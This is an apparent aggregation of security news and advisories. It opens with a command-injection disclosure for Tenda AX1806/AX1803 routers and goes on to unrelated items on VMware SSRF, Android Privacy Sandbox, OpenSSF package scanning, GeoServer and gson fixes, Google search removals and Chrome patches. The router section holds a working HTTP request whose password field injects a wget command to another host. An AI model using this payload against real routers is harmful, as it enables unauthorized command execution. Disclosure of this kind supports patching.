Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Users should patch immediately

A security vulnerability in a mobile device management software could allow attackers access to organizations’ internal and cloud networks, researchers warn.

Discovered by Assetnote, the server-side request forgery (SSRF) bug was found in VMWare Workspace One UEM.

Tracked as CVE-2021-22054, the vulnerability could risk credentials and other sensitive data falling into the hands of malicious attackers.

Read more of the latest news about security vulnerabilities

“We discovered a pre-authentication vulnerability that allowed us to make arbitrary HTTP requests, including requests with any HTTP method and request body,” the researchers wrote in a blog post.

“In order to exploit this SSRF, we had to reverse engineer the encryption algorithm used by VMWare Workspace One UEM.”

The team were able to breach “a number of” organizations using the software, accessing both their internal network and cloud services.

DON’T MISS VirusTotal debunks claims of a serious vulnerability in Google-owned antivirus service

Speaking to The Daily Swig, Assetnote’s Subham Shah said: “While I cannot share exact details about what companies were effected, there were a large number of enterprises that were vulnerable to this.

“In some cases, it was possible to use this vulnerability to breach the AWS accounts of the companies.”

Shah added: “The impact of this vulnerability is rather on the organization running the software, instead of the individual users that are using the products.

“Using the SSRF vulnerability, it is possible to reach arbitrary hosts on the internal network. On cloud networks such as AWS, it is possible to reach the metadata IP address and potentially steal security credentials.

“Using these security credentials, it is possible to escalate the vulnerability to gain access to other infrastructure belonging to a company.”

**Remediations**

The issue, which was first discovered in November 2021, has since been patched by the vendor.

Shah said that while VMware dealt with the issues “in a timely manner”, researchers agreed to the vendor’s request for more time to release more patches and allow customers to patch their instances before disclosure.

An advisory from VMWare contains details of fixes for the software.

Shah advised users of mobile management device software “if possible, do not expose the MDM solution to the external internet”.

YOU MAY ALSO LIKE IBM database updates address critical vulnerabilities in third-party XML parser

Security bug in VMWare Workspace ONE could allow access to internal, cloud networks

Google has officially released the first developer preview for the Privacy Sandbox on Android 13, offering an "early look" at the SDK Runtime and Topics API to boost users' privacy online.
"The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year," the search giant said in an overview.
A "multi-year effort,"

Google has officially released the first developer preview for the **Privacy Sandbox** on Android 13, offering an "early look" at the SDK Runtime and Topics API to boost users' privacy online.

"The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year," the search giant said in an overview.

A "multi-year effort," Privacy Sandbox on Android aims to create technologies that's both privacy-preserving as well as keep online content and services free without having to resort to opaque methods of digital advertising.

The idea is to limit sharing of user data with third-parties and operate without cross-app identifiers, including advertising ID, a unique, user-resettable string of letters and digits that can be used to track users as they move between apps.

Google originally announced its plans to bring Privacy Sandbox to Android earlier this February, following the footsteps of Apple's App Tracking Transparency (ATT) framework.

Integral to the proposed initiative are two key solutions —

*   **SDK Runtime**, which runs third-party code in mobile apps such as software development kits (SDKs), including those for ads and analytics, in a dedicated sandbox, and

*   **Topics API**, which gleans "coarse-grained" interest signals on-device based on a user's app usage that are then shared with advertisers to serve tailored ads without cross-site and cross-app tracking

To address criticisms that the model could possibly give Google an unfair advantage, the tech behemoth noted that the privacy-oriented systems will be developed as part of the Android Open Source Project (AOSP) to ensure transparency into the design and implementation of these solutions.

"Android will collaborate with the entire industry and app ecosystem on the journey to a more privacy-first mobile platform, and one which supports a rich diversity of value-exchange that benefits users, developers, and advertisers," the company said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Releases First Developer Preview of Privacy Sandbox on Android 13

The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories.
Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the

The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories.

Called the **Package Analysis** project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software.

"The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?," the OpenSSF said.

"The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously," the foundation's Caleb Brown and David A. Wheeler added.

In a test run that lasted a month, the tool identified more than 200 malicious packages uploaded to PyPI and NPM, with a majority of the rogue libraries leveraging dependency confusion and typosquatting attacks.

Google, which is a member of OpenSSF, has also rallied its support behind the Package Analysis project, while emphasizing the need for "vetting packages being published in order to keep users safe."

The tech giant's Open Source Security Team, last year, put forth a new frame called Supply chain Levels for Software Artifacts (SLSA) to ensure the integrity of software packages and prevent unauthorized modifications.

The development comes as the open source ecosystem is being increasingly weaponized to target developers with a variety of malware, including cryptocurrency miners and information stealers.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Here's a New Tool That Scans Open-Source Repositories for Malicious Packages

GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host.

**Release notes****Bug**

GEOS-10308 GeoServer with OGCAPI fails to deploy

GEOS-10307 Remove the importer-bdb community module

GEOS-10306 Remove the community QOS module

GEOS-10305 Remove the community NSG module

GEOS-10304 Remove the WFS3 community module

GEOS-10301 Conflicting woodstox parser from ogcapi prevented editing sld styles

GEOS-10282 GeoServer translations files incorrectly decoded assuming UTF-8 causing translation files like GeoServerApplication\_de.properties leading characters represented as question marks

GEOS-10279 Upgrade to Jetty 9.4.44

GEOS-10278 Compatibility issues between FeaturesTemplating and Geofence REST

GEOS-10273 GeofenceAccesManager throws index out of bound when requesting nested layerGroups

GEOS-10266 Features Templating makes getfeatureinfo fail for raster data

GEOS-10264 Address startup warning File option not set for appender \[geoserverlogfile\]

GEOS-10263 WPSRequestBuilderTest assumes that JTS:area is the first process in the list

GEOS-10254 Features templating JSON-LD output should not encode all attributes as string

GEOS-10249 GWC produce NPE when it comes to race condition

GEOS-10245 jdbcconfig: prefixedName filter field not updated

GEOS-10235 Prevent double-quote to be specified as CSV separator

GEOS-10226 ResourcePool leaves empty files on failure

GEOS-10146 App-schema: support for multiple geometries with different CRS

**Improvement**

GEOS-10285 Add Google cloud support to the COG community module

GEOS-10265 WFS-T Bulk Transaction optimization

GEOS-10251 Refactor MapML vocabulary to map- custom elements HTML namespace

GEOS-10246 jdbcconfig: performance slow-down from unnecessary transactions

GEOS-10230 MarkFactory WMS rendering performance optimization

**New Feature**

GEOS-10287 Extend GeoServer freemarker templates support to read properties from a JSON file

GEOS-10274 Geofence follow up LayerGroup Style addition

GEOS-10252 Add Styles support to LayerGroup

GEOS-10228 Wrap the category text values of a legend

GEOS-10223 Support MBTiles in OGC Tiles API

**Task**

GEOS-10297 Remove unnecessary warning suppressions

GEOS-10296 Upgrade to ErrorProne 2.10.0

GEOS-10293 Upgrade to ErrorProne 2.9.0

GEOS-10269 Overriding JSON Object while Merging Feature Templates

GEOS-10268 Null Support in Features Templating

GEOS-10238 Test logging WARNING: Extension lookup, but ApplicationContext is unset

CVE-2021-40822: Releases · geoserver/geoserver

The package com.google.code.gson:gson before 2.8.9 are vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may lead to DoS attacks.

**Conversation**

Adversaries might be able to forge data which can be abused for DoS attacks.
These classes are already writing a replacement JDK object during serialization
for a long time, so this change should not cause any issues.

 Marcono1234 deleted the marcono1234/java-deserialization-internal-classes branch

Oct 13, 2021

sakibguy added a commit to sakibguy/gson that referenced this issue

Oct 14, 2021

Prevent Java deserialization of internal classes (google#1991)

goodwinnk added a commit to JetBrains/kotlin that referenced this issue

Apr 11, 2022

goodwinnk added a commit to JetBrains/kotlin that referenced this issue

Apr 11, 2022

goodwinnk added a commit to JetBrains/kotlin that referenced this issue

Apr 12, 2022

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 14, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 14, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 15, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 15, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 15, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 15, 2022

 

Alefas pushed a commit to JetBrains/kotlin that referenced this issue

Apr 18, 2022

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 19, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 19, 2022

 

Tapchicoma pushed a commit to JetBrains/kotlin that referenced this issue

Apr 19, 2022

 

Alefas pushed a commit to JetBrains/kotlin that referenced this issue

Apr 20, 2022

max-kammerer pushed a commit to JetBrains/kotlin that referenced this issue

Apr 24, 2022

CVE-2022-25647: Prevent Java deserialization of internal classes by Marcono1234 · Pull Request #1991 · google/gson

**Conversation**

Adversaries might be able to forge data which can be abused for DoS attacks.
These classes are already writing a replacement JDK object during serialization
for a long time, so this change should not cause any issues.

 Marcono1234 deleted the marcono1234/java-deserialization-internal-classes branch

Oct 13, 2021

sakibguy added a commit to sakibguy/gson that referenced this issue

Oct 14, 2021

Prevent Java deserialization of internal classes (google#1991)

cocreature added a commit to digital-asset/daml that referenced this issue

Jul 12, 2022

some people get unhappy about
google/gson#1991, the new version includes the
fix

changelog\_begin
changelog\_end

cocreature added a commit to digital-asset/daml that referenced this issue

Jul 13, 2022

some people get unhappy about
google/gson#1991, the new version includes the
fix

changelog\_begin
changelog\_end

garyverhaegen-da pushed a commit to digital-asset/daml that referenced this issue

Jul 15, 2022

 

some people get unhappy about
google/gson#1991, the new version includes the
fix

changelog\_begin
changelog\_end

garyverhaegen-da added a commit to digital-asset/daml that referenced this issue

Jul 15, 2022

 

some people get unhappy about
google/gson#1991, the new version includes the
fix

changelog\_begin
changelog\_end

Co-authored-by: Moritz Kiefer <moritz.kiefer@purelyfunctional.org>

Maybe you don't want your phone number, email, home address, and other details out there for all the web to see. Here's how to make them vanish.

Google announced on April 27 that the public can now submit removal requests for additional Google Search results containing personal information. The company previously had a very high bar for getting results with sensitive info wiped away. It can be frightening to have your email address, phone number, or home address pop up in a search result, and you need to take action to protect your privacy.

In addition to the removal of personal information, Google is considering removal requests for images of minors, deepfake pornography, and other explicit content. Although getting results scrubbed from Google Search won’t remove web pages from the internet, it will divert one of the biggest drivers of traffic.

There’s no guarantee that unwanted search results will disappear completely, however. As a result of your request, the web page could be removed from all searches on Google, only searches involving your name, or none of the above. For more information about disappearing digitally, check out our tips on deleting yourself from the internet from senior writer Matt Burgess.

As part of the announcement, Google’s Global Policy Lead for Search, Michelle Chang, wrote, “Open access to information is a key goal of Search, but so is empowering people with the tools they need to protect themselves and keep their sensitive, personally identifiable information private.” The new procedures can protect against malicious doxxing, as well as information leaks that are only implicit threats.

To begin the removal process, visit the topic’s support page, scroll halfway down, and click the blue **Start removal request** button. You will initially be asked whether you have reached out to the owners of the website. It is not necessary to do this, so you can just tap **No, I prefer not to**. When Google asks what you would like removed, select: **Personal info, like ID numbers and private documents**.

Then you can specify what type of personal information is showing up in Google Search, such as your contact details or driver’s license. These steps are only for removing results from live websites; there’s a separate form to fill out for cached pages. Check the box indicating that the content is live. The next question asks whether the request pertains to doxxing, which Google defines as “contact information being shared with malicious, threatening, or harassing intent.”

How to Remove Your Personal Info From Google's Search Results

Google has released an update for the Chrome browser that includes 30 security fixes. Edge and other Chromium-based browsers also need updating.
The post Update now! Critical patches for Chrome and Edge appeared first on Malwarebytes Labs.

Google has released an update for its Chrome browser that includes 30 security fixes. The latest version of the stable channel is now Chrome 101.0.4951.41 for Windows, Mac and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

Microsoft advises Edge users—which is essentially a Microsoft-badged version of Chrome—to update as well, since it shares many of these vulnerabilities.

Seven of the vulnerabilities are rated as “high.” Five of those vulnerabilities are “Use after free” flaws, which, thanks to a memory relocation issue, can allow hackers to pass arbitrary code to a program. Which is another way of saying that attackers can do unauthorized things on your computer just by getting you to go to a malicious web page coded to exploit these problems.

**Use after free**

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The use after free vulnerabilities that are listed with a high severity are:

*   **CVE-2022-1477**, a use-after-free vulnerability in the Vulkan graphics API.
*   **CVE-2022-1478**, a use-after-free vulnerability in the SwiftShader 3D renderer.
*   **CVE-2022-1479**, a use-after-free vulnerability in ANGLE a “graphics engine abstraction layer.”
*   **CVE-2022-1480**, is a use-after-free vulnerability in Device API. A remote attacker can reportedly create a specially crafted web page, trick the victim into visiting it, trigger the use-after-free error and execute arbitrary code on the target system.
*   **CVE-2022-1481**, is a use-after-free vulnerability in Sharing. This vulnerability can be reportedly be exploited by a remote non-authenticated attacker via the Internet, by luring the victim to a specially crafted web page.

**Other high severity vulnerabilities**

There are two other vulnerabilities listed as high severity issues:

*   **CVE-2022-1482**, is described as an “Inappropriate implementation in WebGL” in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it and compromise their system.
*   **CVE-2022-1483**, is a heap buffer overflow in WebGPU, a web API that exposes modern computer graphics capabilities for the Web. Heap is the name for a region of a process’ memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, the two common areas that are targeted for overflows are the stack and the heap.

**How to update**

If you’re a Chrome user on Windows, Mac, or Linux, you should update to version 101.0.4951.41 as soon as possible.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up blocking automatic updates if you never close the browser, or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities listed.

My preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

So you don’t have to track the version number, when Chrome is up to date it displays the message “Chrome is up to date”

After the updates Chrome should be at version 101.0.4951.41 and Edge should be at version 101.0.1210.32.

Stay safe, everyone!

Tag

#google